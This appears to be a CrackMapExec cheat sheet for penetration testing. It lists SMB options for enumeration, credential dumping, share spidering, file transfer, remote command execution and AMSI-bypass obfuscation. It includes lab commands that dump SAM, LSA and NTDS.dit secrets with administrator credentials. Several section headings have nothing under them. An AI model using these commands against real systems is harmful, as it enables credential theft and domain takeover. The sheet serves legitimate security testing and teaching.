Mapping/Enumeration
Options for Mapping/Enumerating
--shares enumerate shares and access
--sessions enumerate active sessions
--disks enumerate disks
--loggedon-users-filter LOGGEDON_USERS_FILTER
only search for specific user, works with regex
--loggedon-users enumerate logged on users
--users [USER] enumerate domain users, if a user is specified than only its information is queried.
--groups [GROUP] enumerate domain groups, if a group is specified than its members are enumerated
--computers [COMPUTER]
enumerate computer users
--local-groups [GROUP]
enumerate local groups, if a group is specified then its members are enumerated
--pass-pol dump password policy
--rid-brute [MAX_RID]
enumerate users by bruteforcing RID's (default: 4000)
--wmi QUERY issues the specified WMI query
--wmi-namespace NAMESPACE
WMI Namespace (default: root\cimv2)
Credential Gathering
Options for gathering credentials
--enabled Only dump enabled targets from DC
--user USERNTDS Dump selected user from DC
--sam dump SAM hashes from target systems
--lsa dump LSA secrets from target systems
--ntds [{drsuapi,vss}] dump the NTDS.dit from target DCs using the
specifed method (default: drsuapi)
Dumping SAM database
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --sam
Dumping LSA Database
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --lsa
Dumping NTDS – DRSUAPI
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --ntds drsuapi
Dumping NTDS – VSS
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --ntds vss
Spidering
Options for spidering shares
--spider SHARE share to spider
--spider-folder FOLDER
folder to spider (default: root share directory)
--content enable file content searching
--exclude-dirs DIR_LIST
directories to exclude from spidering
--pattern PATTERN [PATTERN ...]
pattern(s) to search for in folders, filenames and file content
--regex REGEX [REGEX ...]
regex(s) to search for in folders, filenames and file content
--depth DEPTH max spider recursion depth (default: infinity & beyond)
--only-files only spider files
Hacking Authentication
brute force passwords
Password Spraying
Managing Files
Options for put and get remote files
--put-file FILE FILE Put a local file into remote target, ex: whoami.txt \\Windows\\Temp\\whoami.txt
--get-file FILE FILE Get a remote file, ex: \\Windows\\Temp\\whoami.txt whoami.txt
Remote Command Execution
Command Execution:
Options for executing commands
--exec-method {wmiexec,smbexec,atexec,mmcexec}
method to execute the command. Ignored if in MSSQL mode (default: wmiexec)
--codec CODEC Set encoding used (codec) from the target's output (default "utf-8"). If errors are detected, run chcp.com at the target, map the result with
https://docs.python.org/3/library/codecs.html#standard-encodings and then execute again with --codec and the corresponding codec
--force-ps32 force the PowerShell command to run in a 32-bit process
--no-output do not retrieve command output
-x COMMAND execute the specified command
-X PS_COMMAND execute the specified PowerShell command
Powershell Obfuscation
Options for PowerShell script obfuscation
--obfs Obfuscate PowerShell scripts
--amsi-bypass FILE File with a custom AMSI bypass
--clear-obfscripts Clear all cached obfuscated PowerShell scripts
Reverse Shells
CrackMapExec Samba Modules
crackmapexec smb -L